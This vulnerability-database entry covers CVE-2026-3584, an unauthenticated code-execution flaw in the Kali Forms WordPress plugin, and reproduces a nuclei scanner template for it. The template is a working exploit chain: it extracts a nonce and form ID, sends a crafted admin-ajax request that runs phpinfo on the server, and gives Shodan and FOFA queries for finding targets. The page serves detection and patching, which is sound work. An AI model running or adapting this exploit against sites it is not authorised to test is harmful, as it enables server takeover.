WordPress Kali Forms <= 2.4.9 - Remote Code Execution

Published 05 Jul 2026 03:01:21. Reported by ProjectDiscovery. Type: nuclei. Source: github.com

Kali Forms plugin <=2.4.9 enables unauthenticated remote code execution due to unsafe input handling.

Related

Reporter | Title | Published | Family
ATTACKERKB | CVE-2026-3584 | 20 Mar 2026 21:25 | attackerkb
Circl | CVE-2026-3584 | 20 Mar 2026 22:17 | circl
CNNVD | WordPress plugin Kali Forms code injection vulnerability | 20 Mar 2026 00:00 | cnnvd
CVE | CVE-2026-3584 | 20 Mar 2026 21:25 | cve
Cvelist | CVE-2026-3584 Kali Forms <= 2.4.9 - Unauthenticated Remote Code Execution via form_process | 20 Mar 2026 21:25 | cvelist
EUVD | EUVD-2026-13814 | 21 Mar 2026 00:31 | euvd
GithubExploit | Exploit for CVE-2026-3584 | 25 Mar 2026 09:21 | githubexploit
NVD | CVE-2026-3584 | 20 Mar 2026 22:16 | nvd
Packet Storm | WordPress Kali Forms 2.4.9 Remote Code Execution | 20 Apr 2026 00:00 | packetstorm
Patchstack | WordPress Kali Forms plugin <= 2.4.9 - Unauthenticated Remote Code Execution via form_process vulnerability | 23 Mar 2026 10:14 | patchstack

Code

id: CVE-2026-3584

info:
  name: WordPress Kali Forms <= 2.4.9 - Remote Code Execution
  author: pussycat0x
  severity: critical
  description: |
    Kali Forms WordPress plugin <= 2.4.9 contains a remote code execution vulnerability caused by unsafe user input handling in the 'form_process' and 'prepare_post_data' functions, letting unauthenticated attackers execute code on the server; the exploit requires no authentication.
  impact: |
    Unauthenticated attackers can execute arbitrary code on the server, potentially leading to full system compromise.
  remediation: |
    Update to the latest version beyond 2.4.9.
  reference:
    - https://wordpress.org/plugins/kali-forms/
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kali-forms/kali-forms-249-unauthenticated-remote-code-execution-via-form-process
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2026-3584
    epss-score: 0.07239
    epss-percentile: 0.93576
    cwe-id: CWE-94
  metadata:
    verified: true
    max-request: 6
    product: kali-forms
    framework: wordpress
    fofa-query: body="kali-forms"
    shodan-query: http.component:"WordPress" http.html:"kali-forms"
  tags: cve,cve2026,wordpress,wp-plugin,kali-forms,rce,unauth,vkev

flow: |
  var paths = ["/contact-us/", "/contact/", "/form/", "/feedback/", "/"];
  for (var i = 0; i < paths.length; i++) {
    set("form_path", paths[i]);
    if (http(1)) {
      http(2);
      break;
    }
  }

http:
  - raw:
      - |
        GET {{form_path}} HTTP/1.1
        Host: {{Hostname}}

    redirects: true
    max-redirects: 3

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "KaliFormsObject")'
          - 'contains(body, "ajax_nonce")'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: nonce
        part: body
        group: 1
        regex:
          - 'ajax_nonce":"([a-f0-9]+)"'
        internal: true

      - type: regex
        name: form_id
        part: body
        group: 1
        regex:
          - 'data-form-id="(\d+)"'
        internal: true

      - type: regex
        name: version
        part: body
        group: 1
        regex:
          - 'kali-forms/[^"]*(?:js|css)\?ver=([0-9.]+)'
        internal: true

  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=kaliforms_form_process&data[nonce]={{nonce}}&data[formId]={{form_id}}&data[first-name]=test&data[last-name]=user&data[email]=test%40example.com&data[message]=test&data[thisPermalink]=phpinfo

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "phpinfo()</title>"
          - "PHP Extension"
          - "PHP Version"
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: php_version
        part: body
        group: 1
        regex:
          - 'PHP Version ([0-9.]+)'
# digest: 4a0a0047304502203aa00f646a9b307da9caff214477aa98aa26f0e7754a75e5f33e4b294bfce6dc022100a8aa349dd63d13f38c57e38056c79a58870880d00aa2cf034fca856865a59c84:922c64590222798bb761d5b6d8e72950


Scores as of 09 Apr 2026 09:48 (current)
Vulners AI Score: 6.7 (medium risk)
CVSS 3.1: 9.8
EPSS: 0.07239